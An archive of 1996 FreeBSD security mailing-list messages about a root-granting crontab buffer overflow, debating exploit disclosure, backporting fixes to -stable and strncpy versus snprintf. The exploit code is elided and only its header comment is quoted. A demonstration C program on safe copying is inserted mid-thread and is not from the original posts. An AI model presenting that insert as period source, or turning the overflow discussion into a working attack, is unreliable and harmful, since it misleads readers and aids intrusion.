To: freebsd-security@freebsd.org
Date: Mon, 16 Dec 1996 17:59:06 MET

hi,

I'd like to ask why patches included in -current aren't in the -stable
version? There are a few serious bugs (security too) fixed in -current but
not in -stable. How long does it take to move patches to the -stable source
tree??

-adam

From owner-freebsd-security Mon Dec 16 08:56:57 1996
Subject: Re: crontab security hole exploit
To: security@FreeBSD.ORG
Date: Mon, 16 Dec 1996 08:54:26 -0800 (PST)
From: "Craig Shaver"
In-Reply-To: from "Joakim Rastberg" at Dec 16, 96 03:55:59 pm

>
> On Mon, 16 Dec 1996, Richard Wackerbarth wrote:
> >>Exploit for buffer overflow in crontab.
> >Please do not post exploit details to the list. The details can be sent
> >privately to security-officer@FreeBSD.ORG.
> >Observations that they exist, preferably with impact statements (eg. user
> >can gain root access) and proposed fixes are appropriate for public notice.
>
> Is that official? Or only wishful thinking (ie if no one posts them they
> will go away?). I would rather like the exploits to be posted, as they can
> be used to leverage the "management" to pay attention (background: I am
> working as a contractor to run some unix-boxes and although I whine about
> the low security *nothing* happens until I can show I get a #, then someone
> perhaps pulls the plug and pays for a more secure installation. My point
> being that many companies, at least the ones I work for, IGNORE holes
> until someone has shown them the exploit)
>
> /joakim rastberg, Xinit AB, Sundsvall Sweden.
>
>

It certainly helps me understand what is really going on. I can learn from
this to code defensively.

Is there someplace or some book that someone who is writing new software can
refer to for learning how to write secure code in the first place? I
certainly don't want to ask some whiny security cop for each and every
little detail....
:)

--
Craig Shaver (craig@progroup.com) (415)390-0654
Productivity Group, POB 60458, Sunnyvale, CA 94088

From owner-freebsd-security Mon Dec 16 09:32:28 1996
Date: Mon, 16 Dec 1996 17:32:05 +0000 (GMT)
From: Scot Elliott
Reply-To: pumpkin@uk.pi.net
To: FreeBSD Security list
Subject: Re: crontab security hole exploit

On Mon, 16 Dec 1996, Richard Wackerbarth wrote:

> >Hello!
> >
> >Exploit for buffer overflow in crontab.
> >
> >
> >/* ---------------------------- CUT HERE
> >----------------------------------- */
>
> Please do not post exploit details to the list. The details can be sent
> privately to security-officer@FreeBSD.ORG.
> Observations that they exist, preferably with impact statements (eg. user
> can gain root access) and proposed fixes are appropriate for public notice.
>

Yeah... well although it's not really appropriate to publicly explain how
to crack a system, I personally find it more educational than just a
patch... at least then it's easy to see how the hack was working, whereas
the output from diff isn't all that easy to follow.

Scot.

--
Scot Elliott, MEng Computing IV, Imperial College, London
Please note that any opinions expressed are mine, and not those of the
department or college.
e-mail: s.elliott@ic.ac.uk, pumpkin@uk.pi.net
IRC nick: PlumbrBoy
"You are everything in my fridge"

From owner-freebsd-security Mon Dec 16 10:07:27 1996
From: Wolfgang Ley
Subject: Re: crontab security hole exploit
To: craig@ProGroup.COM (Craig Shaver)
Date: Mon, 16 Dec 1996 19:10:11 +0100 (MET)
Cc: security@freebsd.org
Organization: DFN-CERT (Computer Emergency Response Team, Germany)

Craig Shaver wrote:
> [...]
> It certainly helps me understand what is really going on. I can learn from
> this to code defensively.
>
> Is there someplace or some book that someone who is writing new software can
> refer to for learning how to write secure code in the first place? I
> certainly don't want to ask some whiny security cop for each and every
> little detail.... :)

You might want to check the "Secure Programming Checklist", which is a
collection of the suggestions from the "Practical UNIX and Internet
Security" book and a paper from AUSCERT.

ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist

...or any mirror

Bye,
Wolfgang.

- --
Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany
Email: ley@cert.dfn.de  Phone: +49 40 5494-2262  Fax: +49 40 5494-2241
PGP-Key available via finger ley@ftp.cert.dfn.de, any key-server or via WWW
from http://www.cert.dfn.de/~ley/ ...have a nice day

From owner-freebsd-security Mon Dec 16 10:18:24 1996
Date: Mon, 16 Dec 1996 12:18:05 -0600
To: "Craig Shaver"
From: Richard Wackerbarth
Subject: Re: crontab security hole exploit
Cc: security@FreeBSD.org

>Is there someplace or some book that someone who is writing new software can
>refer to for learning how to write secure code in the first place? I
>certainly don't want to ask some whiny security cop for each and every
>little detail.... :)

Most of the exploits currently being discovered are a direct result of
programs which move user input into a fixed buffer without checking the
length of the string. In each case, someone figures out what will get
clobbered and creates a "string" that is designed to overwrite whatever
follows the buffer. When those buffers are on the stack, it is very easy to
clobber the return stack with a piece of code that takes control.

The solution is to use "safe" string copy routines that honor the length of
the receiving buffer.

Since the methodology of a particular instance does not add to the sphere
of knowledge, the details of the exploit don't really give most of us any
useful information.

From owner-freebsd-security Mon Dec 16 10:24:37 1996
Date: Mon, 16 Dec 96 10:19:57 -0800
From: Cy Schubert - ITSD Open Systems Group
Reply-to: cschuber@uumail.gov.bc.ca
To: Terry Lambert
cc: rb@gid.co.uk (Bob Bishop), proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG
Subject: Re: vulnerability in new pw suite
In-reply-to: Your message of "Sun, 15 Dec 96 13:39:04 MST." <199612152039.NAA23837@phaeton.artisoft.com>

DEC UNIX, with C2 security enabled, allows the user to decide whether to use
a system generated password or a user picked password. One could take this
concept one step further than DEC has done and have it controlled by a
configuration file with either global or per-user defaults.

passer$ passwd
Old password:
Last successful password change for cschuber: Mon Dec 2 07:06:07 1996
Last unsuccessful password change for cschuber: Fri Mar 1 08:03:27 1996

Do you want (choose one letter only):
        Pronounceable passwords generated for you (g)
        A string of characters generated for you (c)
        A string of letters generated for you (l) ?
        To pick your password (p) ?

Enter choice here (q to quit): q
Password not changed: user aborted program.
passer$

Just my $0.02 worth.

Regards,                       Phone:    (250)387-8437
Cy Schubert                    OV/VM:    BCSC02(CSCHUBER)
Open Systems Support           BITNET:   CSCHUBER@BCSC02.BITNET
ITSD                           Internet: cschuber@uumail.gov.bc.ca
                                         cschuber@bcsc02.gov.bc.ca

"Quit spooling around, JES do it."
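Richard Wackerbarth's reply above, on user input copied into fixed buffers and the "safe" copy routines that honour the receiving buffer's length, worked through as an added example; this is illustrative code written for this archive, not code from crontab or from any poster. The buffer size USER_LEN and the set_user() helper are assumptions for the demonstration: it contrasts the strncpy() idiom (which needs explicit termination) with the snprintf() form used in the -stable patch (whose return value reveals truncation), and refuses a user name that would otherwise be silently shortened into a different name.

```c
#include <stdio.h>
#include <string.h>

/* Demonstration buffer size (an assumption for this example; the real
 * crontab.c buffer sizes are not given in the thread). */
#define USER_LEN 8

/* Scratch destination buffer shared by the demonstrations below. */
char Scratch[USER_LEN];

/* Stand-in for the crontab global that the -u option fills (assumed name). */
static char User[USER_LEN];

/* Bounded copy using the strncpy() idiom. strncpy() never writes past
 * dst[n-1], but when src has n-1 or more characters it leaves no NUL
 * behind, so the caller must terminate the buffer explicitly.
 * Returns 1 if the copy was truncated, 0 otherwise. */
int copy_strncpy(char *dst, size_t n, const char *src)
{
    strncpy(dst, src, n - 1);
    dst[n - 1] = '\0';
    return strlen(src) >= n;
}

/* Bounded copy using snprintf(), the form the -stable patch used.
 * snprintf() always NUL-terminates within n bytes and returns the length
 * the full string would have had, so truncation can be detected from the
 * return value instead of silently accepted. Returns 1 if truncated. */
int copy_snprintf(char *dst, size_t n, const char *src)
{
    int needed = snprintf(dst, n, "%s", src);
    return needed < 0 || (size_t)needed >= n;
}

/* Shows the strncpy() caveat: a raw strncpy(dst, src, n) with a source of
 * n or more characters leaves dst without a terminator. The buffer is
 * pre-filled with a marker so the result is visible.
 * Returns 1 if dst[n-1] is a NUL after the raw call, 0 if it is not.
 * n must not exceed USER_LEN. */
int raw_strncpy_terminates(size_t n, const char *src)
{
    char buf[USER_LEN + 1];
    memset(buf, 'X', sizeof buf);
    strncpy(buf, src, n);
    return buf[n - 1] == '\0';
}

/* Mirrors the crontab -u handling with the extra check a reviewer would
 * want: copy the requested name into the fixed buffer, but refuse a name
 * that does not fit rather than silently shortening it into a different
 * (and possibly existing) user name. Returns 0 on success, -1 on
 * rejection; User is left empty on rejection. */
int set_user(const char *name)
{
    if (copy_snprintf(User, sizeof User, name)) {
        User[0] = '\0';
        return -1;
    }
    return 0;
}

const char *current_user(void)
{
    return User;
}

int main(void)
{
    /* Constructed sample inputs: a short name and an over-long one. */
    const char *names[] = { "root", "averylongusername" };
    size_t i;
    int t1, t2;

    for (i = 0; i < sizeof names / sizeof names[0]; i++) {
        t1 = copy_strncpy(Scratch, sizeof Scratch, names[i]);
        printf("strncpy : \"%s\" -> \"%s\" truncated=%d\n", names[i], Scratch, t1);
        t2 = copy_snprintf(Scratch, sizeof Scratch, names[i]);
        printf("snprintf: \"%s\" -> \"%s\" truncated=%d\n", names[i], Scratch, t2);
        printf("set_user(\"%s\") = %d, User=\"%s\"\n", names[i],
               set_user(names[i]), current_user());
    }
    printf("raw strncpy of 8 chars into 8 bytes terminated? %d\n",
           raw_strncpy_terminates(USER_LEN, "12345678"));
    return 0;
}
```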
From owner-freebsd-security Mon Dec 16 10:33:05 1996
From: Guido van Rooij
Subject: Re: why is -stable not secure?
To: mikee@solozzo.tele.pw.edu.pl (Adam Kubicki)
Date: Mon, 16 Dec 1996 19:32:07 +0100 (MET)
Cc: freebsd-security@freebsd.org

Adam Kubicki wrote:
> hi,
>
> I'd like to ask why patches included in -current aren't in the -stable
> version? There are a few serious bugs (security too) fixed in -current but
> not in -stable. How long does it take to move patches to the -stable source
> tree??
>

Normally they are fixed in both. The recent cron things have been
overlooked, unfortunately.

-Guido

From owner-freebsd-security Mon Dec 16 10:53:03 1996
Date: Mon, 16 Dec 1996 11:21:08 -0700 (MST)
From: Marc Slemko
To: Peter Radcliffe
cc: freebsd-bugs@freebsd.org, freebsd-security@freebsd.org
Subject: Re: crontab security hole

Sorry. Delete lines 36 and 37 of the patch. That is, delete the middle
two lines from the below section:

*** crontab.c 1996/04/09 21:23:11 1.3.4.1
--- crontab.c 1996/12/15 20:37:59 1.3.4.2
***************
*** 17,23 ****
***************
*** 167,173 ****

I manually removed the RCS $Id$ part of the patch and left an extra two
lines in.

On Mon, 16 Dec 1996, Peter Radcliffe wrote:

> > It was fixed in -stable the other day by pst. The patch, pulled
> > from the CVS tree, follows.
>
> Yes, but trying to apply that patch to this 2.1.5 box
> gives me:
> --------------------------
> Patching file crontab/crontab.c using Plan A...
> patch: **** unexpected end of hunk at line 38
> --------------------------
>
> Peter.
>

From owner-freebsd-security Mon Dec 16 10:53:49 1996
Date: Mon, 16 Dec 1996 11:35:05 -0700 (MST)
From: Marc Slemko
To: Jason Downs
cc: Dmitry Valdov, freebsd-security@freebsd.org
Subject: Re: crontab security hole

[removed from -bugs]

On Mon, 16 Dec 1996, Jason Downs wrote:

> In message , Marc Slemko writes:
> >
> >It was fixed in -stable the other day by pst. The patch, pulled
> >from the CVS tree, follows.
>
> Haven't any of you ever heard of a very simple and efficient non-stdio
> routine called, of all things, strncpy()?
>
> It's been around for, like, ever.

I'm sure that many of us have. If I was writing the patch, I would
probably use strncpy. However, I think the reason why strncpy wasn't used
is because it won't null terminate the string if it is >= the length given.
It just means an extra line of code to make sure it is terminated, but I
don't see it as being much more than a matter of style in this context.

A few quick informal benchmarks show that strncpy is faster than snprintf
in some cases and snprintf is faster than strncpy in others.

From owner-freebsd-security Mon Dec 16 10:54:25 1996
Date: Mon, 16 Dec 1996 11:39:58 -0700 (MST)
From: Marc Slemko
X-Sender: marcs@alive.ampr.ab.ca
To: Richard Wackerbarth
cc: Joakim Rastberg , security@freebsd.org
Subject: Re: crontab security hole exploit
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Yes. Fixes should be posted before exploits. Give people a day or two to fix a hole. People who know what they are doing can make their own exploit once they know the problem exists, but if they wanted to, people like that could find the problem themselves anyway. This particular hole is nothing new; unfortunately it slipped through the cracks in -stable.

However, if a fix has been available there is nothing wrong with posting an exploit. People shouldn't need to see exploits to act on a known hole; I will bet that there are many people out there who file the hole as "something to get around to fixing sometime" until they see a pretty exploit that gives them root in 2 seconds.

On Mon, 16 Dec 1996, Richard Wackerbarth wrote:

> jor@xinit.se writes:
>
> >I would rather like the exploits be posted as they can be used
> >to leverage the "management" to pay attention (background: I am working as
> >a contractor to run some unix-boxes and although I whine about the low
> >security *nothing* happens until I can show I get a #, then someone
> >perhaps pulls the plug and pays for a more secure installation. My point
> >being is that many companies, at least the ones I work for, IGNORE holes
> >until someone has shown them the exploit)
>
> An interesting perspective.
> My attitude is that it is better to have obscurity than having the exploit
> readily available to a wide audience. I realize that the truly good
> crackers can figure it out for themselves. But there are many "children" who
> will try something when it is handed to them. IMHO, we should at least give
> the upper hand to the sysops and, if possible, provide the fix before the
> attack becomes widespread.
>
>

From owner-freebsd-security Mon Dec 16 11:21:09 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id LAA25801 for security-outgoing; Mon, 16 Dec 1996 11:21:09 -0800 (PST)
Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id LAA25793 for ; Mon, 16 Dec 1996 11:21:05 -0800 (PST)
Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id MAA20323; Mon, 16 Dec 1996 12:20:41 -0700 (MST)
Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id MAA09461; Mon, 16 Dec 1996 12:18:39 -0700 (MST)
Date: Mon, 16 Dec 1996 12:18:39 -0700 (MST)
From: Marc Slemko
X-Sender: marcs@alive.ampr.ab.ca
To: Adam Kubicki
cc: freebsd-security@freebsd.org
Subject: Re: why is -stable not secure?
In-Reply-To: <199612161654.IAA16978@freefall.freebsd.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Because no one has put them there. They can be there the second after they are in -current if they are put there; that happens when the person committing them feels confident enough in the patch and has the time to.

If you think that the holes discovered in -stable (or current, for that matter) are anywhere near all of them, think again. I would bet that if someone wanted to find a hole to exploit, they would simply have to look over the OpenBSD CVS logs to find dozens. These should be integrated into FreeBSD. When will they? When someone has time.

I don't have any more powers than you, but I probably would have had someone commit this fix to -stable within the next few weeks; it is one of the fixes I have sitting around to be committed to various branches that I haven't got around to putting together yet.

Most of these problems require little knowledge to find and little knowledge to fix. In fact, things would be helped if someone sat watching the freebsd-cvs-all list which details all the CVS changes and, if you see an important security fix come through that doesn't get committed to -stable, gently prod the person who committed it to -current to commit it to -stable if possible.

Now it is even worse than before; there are now three different trees: -current (3.0), 2.2, and 2.1. Don't underestimate the work it takes to keep things together when you have three different places to fix.

If there is someone interested in keeping -stable up to date in this way, perhaps they could take on an informal role of keeping it up to date with things like this; find a committer who will take patches from you that you pull from -current and put into -stable.

On Mon, 16 Dec 1996, Adam Kubicki wrote:

> hi,
>
> I'd like to ask why patches included in -current aren't in -stable
> version? There are few serious bugs (security too) fixed in -current but not
> in -stable. How long does it take to move patches to the -stable source tree??
>
> -adam
>

From owner-freebsd-security Mon Dec 16 11:40:36 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id LAA27410 for security-outgoing; Mon, 16 Dec 1996 11:40:36 -0800 (PST)
Received: from service.esys.ca (root@service.esys.ca [141.118.1.124]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id LAA27405 for ; Mon, 16 Dec 1996 11:40:30 -0800 (PST)
Received: from monet.esys.ca by service.esys.ca with smtp (Smail3.1.28.1 #1) id m0vZiwX-000UlmC; Mon, 16 Dec 96 12:43 MST
Received: from cezanne.esys.ca by monet.esys.ca with smtp (Smail3.1.28.1 #6) id m0vZixN-000RZVC; Mon, 16 Dec 96 12:44 MST
From: Lyndon Nerenberg
To: adrian@virginia.edu
cc: freebsd-security@freebsd.org, Don Lewis
Subject: Tripwire database for release tree
In-Reply-To:
Message-ID:
Date: Mon, 16 Dec 1996 12:44:09 -0700 (MST)
Priority: NORMAL
X-Mailer: Simeon for Hpux Motif Version 4.1 Beta 3
X-Authentication: none
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 10 Dec 1996 10:19:54 -0500 (EST) "Adrian T. Filipi-Martin" wrote:

> This reminds me, has anyone considered getting a precomputed list
> of MD5 signatures for all precompiled system binaries onto the
> distribution CDs? While it would not necessarily help those who recompile
> world, it would still be a handy time saver. I suppose even the scripts
> to make and compare the MD5 checksums would be handy as part of the
> system.

I've been promising to do this for the better part of a year now. The plan was to include tripwire in the ports collection, and build a precomputed database corresponding to the release binaries that would be included on the CDROM. You could then run tripwire against the CD database to look for altered files. I will see if I can free up a couple of days over the Xmas holidays to complete this work.

--lyndon

From owner-freebsd-security Mon Dec 16 12:28:27 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id MAA00216 for security-outgoing; Mon, 16 Dec 1996 12:28:27 -0800 (PST)
Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id MAA00211 for ; Mon, 16 Dec 1996 12:28:23 -0800 (PST)
Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id VAA00967 for ; Mon, 16 Dec 1996 21:28:16 +0100
Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id VAA28595 for security@freebsd.org; Mon, 16 Dec 1996 21:28:15 +0100
Received: (from roberto@localhost) by keltia.freenix.fr (8.8.4/keltia-uucp-2.9) id TAA10693; Mon, 16 Dec 1996 19:16:17 +0100 (CET)
Message-ID:
Date: Mon, 16 Dec 1996 19:16:17 +0100
From: roberto@keltia.freenix.fr (Ollivier Robert)
To: security@freebsd.org
Subject: Re: crontab security hole exploit
References:
X-Mailer: Mutt 0.54
Mime-Version: 1.0
X-Operating-System: FreeBSD 3.0-CURRENT ctm#2815
In-Reply-To: ; from Richard Wackerbarth on Dec 16, 1996 09:14:25 -0600
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

According to Richard Wackerbarth:
> My attitude is that it is better to have obscurity than having the exploit
> readily available to a wide audience. I realize that the truly good
> crackers can figure it out for themselves. But there are many "children" who
> will try something when it is handed to them. IMHO, we should at least give

Even the children can subscribe to Bugtraq. Or 8lgm or even linux-security...

> the upper hand to the sysops and, if possible, provide the fix before the
> attack becomes widespread.

Unfortunately it is generally wishful thinking more than anything else. The only time it happens is when the bug is found during a limited beta testing and it can be fixed before release, for example...

--
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #31: Tue Dec 3 23:52:58 CET 1996

From owner-freebsd-security Mon Dec 16 12:46:07 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id MAA01303 for security-outgoing; Mon, 16 Dec 1996 12:46:07 -0800 (PST)
Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id MAA01283; Mon, 16 Dec 1996 12:46:03 -0800 (PST)
Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id NAA01965; Mon, 16 Dec 1996 13:42:51 -0700
From: Terry Lambert
Message-Id: <199612162042.NAA01965@phaeton.artisoft.com>
Subject: Re: vulnerability in new pw suite
To: rb@gid.co.uk (Bob Bishop)
Date: Mon, 16 Dec 1996 13:42:51 -0700 (MST)
Cc: terry@lambert.org, proff@iq.org, security@freebsd.org, hackers@freebsd.org
In-Reply-To: from "Bob Bishop" at Dec 16, 96 00:03:01 am
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> Yeah, fine on an isolated machine, but those pesky users also insist on
> using the same weak password on lots of different systems. So if some
> sleaze does manage to get root on your system and thus access to your
> shadow file, five gets you ten the user passwords he can now derive will
> work on neighbouring systems.

Five gets you ten that he'll just use rlogin instead, and go for root on the new system from the user account, never knowing the user's password (or caring).

Terry Lambert
terry@lambert.org
---
Any opinions in this posting are my own and not those of my present or previous employers.

From owner-freebsd-security Mon Dec 16 12:50:31 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id MAA01606 for security-outgoing; Mon, 16 Dec 1996 12:50:31 -0800 (PST)
Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id MAA01583; Mon, 16 Dec 1996 12:50:27 -0800 (PST)
Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id NAA01987; Mon, 16 Dec 1996 13:47:23 -0700
From: Terry Lambert
Message-Id: <199612162047.NAA01987@phaeton.artisoft.com>
Subject: Re: vulnerability in new pw suite
To: imp@village.org (Warner Losh)
Date: Mon, 16 Dec 1996 13:47:23 -0700 (MST)
Cc: terry@lambert.org, dreamer@garrison.inetcan.net, rb@gid.co.uk, proff@iq.org, security@freebsd.org, hackers@freebsd.org
In-Reply-To: from "Warner Losh" at Dec 15, 96 10:36:35 pm
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> In message <199612152336.QAA00213@phaeton.artisoft.com> Terry Lambert writes:
> : Fool! Your machine is not safe... all ninjas worth their salt carry
> : extra ST-506 controllers! Do you know nothing of Tai-Kwan Leap?
>
> And to Terry Lambert, I leave a boot to the head... :-)
>
> Warner "I learned Tai-Kwan Leap to kick some bootie" Losh

Aie! One of me alone can not hope to defeat you!

Terry Lambert
terry@lambert.org
---
Any opinions in this posting are my own and not those of my present or previous employers.

From owner-freebsd-security Mon Dec 16 13:13:03 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id NAA03321 for security-outgoing; Mon, 16 Dec 1996 13:13:03 -0800 (PST)
Received: from rocket.Ngbert.org (ROCKET.RES.CMU.EDU [128.2.92.143]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id NAA03315; Mon, 16 Dec 1996 13:12:59 -0800 (PST)
Received: from localhost (ayn@localhost) by rocket.Ngbert.org (8.7.5/8.7.3) with SMTP id QAA20725; Mon, 16 Dec 1996 16:09:10 -0500 (EST)
Date: Mon, 16 Dec 1996 16:09:10 -0500 (EST)
From: Andrew Y Ng
To: Dmitry Valdov
cc: freebsd-bugs@freebsd.org, freebsd-security@freebsd.org
Subject: Re: crontab security hole
In-Reply-To:
Message-ID:
Organization: Carnegie Mellon University
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

well, just disallow certain "dangerous" user for setting up cron jobs. or just allow some "good" users to setup cron jobs... :)

/ayn

On Mon, 16 Dec 1996, Dmitry Valdov wrote:

> Are there any fixes for crontab? I've exploit which allow any user to become
> root using crontab security hole.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMrW6dJ6qvWJYgw1hAQHk9QP5AamfF/IA2HUuHqfewPk/sbJ2H0OR+964
b9LLoTgEY+siLSIXXi3lvJWBBgqe5rW//MbNR+ZDoV+3BKkW9aZV+IWqcZQh4VH1
KZ2DcXt8ybcFWSJXTpwtamTCYiYIHP1e5WLqhCvilPvXvY4S9s3FA3QSoypMp4R+
YKxVNFkV1aY=
=ju8p
-----END PGP SIGNATURE-----

--
Andrew Y Ng | Carnegie Mellon University
http://andrew.Ngbert.org | ECE major, Music minor
campus ph: 412/862-2836 | voice mail: 412/268-6700 x30027
| talk: finger ayn@andrew.Ngbert.org
* NGBERT.ORG! * | for online status
http://www.Ngbert.org | finger ayn@CMU.EDU for more info...
--------------------------X-------------------------------------
NetBSD FreeBSD Linux NeXT Be Solaris !windoze . Check three friends. If they're OK, you're it.
From owner-freebsd-security Mon Dec 16 13:18:43 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id NAA03592 for security-outgoing; Mon, 16 Dec 1996 13:18:43 -0800 (PST)
Received: from quackerjack.cc.vt.edu (quackerjack.cc.vt.edu [198.82.160.250]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id NAA03586 for ; Mon, 16 Dec 1996 13:18:38 -0800 (PST)
Received: from sable.cc.vt.edu (sable.cc.vt.edu [128.173.16.30]) by quackerjack.cc.vt.edu (8.7.1/8.7.1) with SMTP id QAA16899; Mon, 16 Dec 1996 16:18:33 -0500 (EST)
Received: from alsatian.cslab.vt.edu (alsatian.cslab.vt.edu [198.82.184.11]) by sable.cc.vt.edu (8.6.12/8.6.12) with SMTP id QAA24434; Mon, 16 Dec 1996 16:18:32 -0500
Received: from husky.cslab.vt.edu by alsatian.cslab.vt.edu (5.65v3.2/1.1.10.5/18Sep96-0417PM) id AA18667; Mon, 16 Dec 1996 16:18:31 -0500
From: Jeff Aitken
Received: by husky.cslab.vt.edu (5.65v3.2/1.1.10.5/22Aug96-1216PM) id AA00715; Mon, 16 Dec 1996 16:18:25 -0500
Message-Id: <9612162118.AA00715@husky.cslab.vt.edu>
Subject: Re: crontab security hole exploit
To: rkw@dataplex.net (Richard Wackerbarth)
Date: Mon, 16 Dec 1996 16:18:25 -0500 (EST)
Cc: jor@xinit.se, security@freebsd.org
In-Reply-To: from "Richard Wackerbarth" at Dec 16, 96 09:14:25 am
X-Mailer: ELM [version 2.4 PL25]
Content-Type: text
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Richard Wackerbarth writes:
>
> My attitude is that it is better to have obscurity than having the exploit
> readily available to a wide audience. I realize that the truly good
> crackers can figure it out for themself. But there are many "children" who
> will try something when it is handed to them. IMHO, we should at least give
> the upper hand to the sysops and, if possible, provide the fix before the
> attack becomes widespread.

Seeing as how the original message had *already* been posted to bugtraq AND BoS, the exploit was *already* in the hands of thousands of (potentially evil-minded) people.

--Jeff

From owner-freebsd-security Mon Dec 16 14:01:06 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA06598 for security-outgoing; Mon, 16 Dec 1996 14:01:06 -0800 (PST)
Received: from Kitten.mcs.com (Kitten.mcs.com [192.160.127.90]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id OAA06585 for ; Mon, 16 Dec 1996 14:00:59 -0800 (PST)
Received: from Mailbox.mcs.com (Mailbox.mcs.com [192.160.127.87]) by Kitten.mcs.com (8.8.2/8.8.2-biteme) with ESMTP id PAA16117; Mon, 16 Dec 1996 15:58:47 -0600 (CST)
Received: from Jupiter.Mcs.Net (karl@Jupiter.mcs.net [192.160.127.88]) by Mailbox.mcs.com (8.8.2/8.8.2) with ESMTP id PAA20334; Mon, 16 Dec 1996 15:58:45 -0600 (CST)
Received: (from karl@localhost) by Jupiter.Mcs.Net (8.8.2/8.8.2) id PAA19217; Mon, 16 Dec 1996 15:58:42 -0600 (CST)
From: Karl Denninger
Message-Id: <199612162158.PAA19217@Jupiter.Mcs.Net>
Subject: Re: Exploit for crontab bug (FreeBSD 2.1.0).
To: leshka@leshka.chuvashia.su
Date: Mon, 16 Dec 1996 15:58:42 -0600 (CST)
Cc: BUGTRAQ@NETSPACE.ORG, security@freebsd.org
In-Reply-To: <199612142224.BAA00961@leshka.chuvashia.su> from "Leshka Zakharoff" at Dec 15, 96 01:24:02 am
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

(exploit elided)

This does not run on -CURRENT with crontab build dates after about mid-October. A perusal of the source shows that the evil sprintf was replaced by snprintf, and that therefore the buffer overwrite should (and appears to in fact) fail.

--
-- Karl Denninger (karl@MCS.Net)| MCSNet - The Finest Internet Connectivity
http://www.mcs.net/~karl | T1's from $600 monthly to FULL DS-3 Service
| 33 Analog Prefixes, 65 ISDN, Web servers $75/mo
Voice: [+1 312 803-MCS1 x219]| Email to "info@mcs.net" WWW: http://www.mcs.net/
Fax: [+1 312 248-9865] | 2 FULL DS-3 Internet links; 400Mbps B/W Internal

> /* ---------------------------- CUT HERE ----------------------------------- */
> /* */
> /* Hi ! */
> /* This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0). */
> /* If you have any problems with it, drop me a letter. */
> /* Have fun ! */
> /* */
> /* */
> /* ---------------------- */
> /* --------------------------------------------- */
> /* ----------------- Dedicated to my beautiful lady ------------------ */
> /* --------------------------------------------- */
> /* ---------------------- */
> /* */
> /* Leshka Zakharoff, 1996.
